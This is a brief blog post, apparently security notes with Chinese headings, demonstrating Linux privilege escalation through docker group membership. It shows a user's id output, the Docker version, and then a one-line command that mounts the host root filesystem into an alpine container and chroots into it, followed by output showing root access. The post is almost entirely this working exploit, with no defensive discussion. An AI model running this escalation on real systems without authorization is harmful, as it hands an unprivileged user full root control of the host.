Docker Group Privilege Escalation

Docker Group Priv-Esc

1
2
~$ id
uid=1000(alfred) gid=1000(alfred) groups=1000(alfred),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),122(docker)

检查 docker

1
2
~$ docker --version  
Docker version 18.09.7, build 2d0083d

Exploit

1
2
3
~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

信息安全
PrivEsc

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!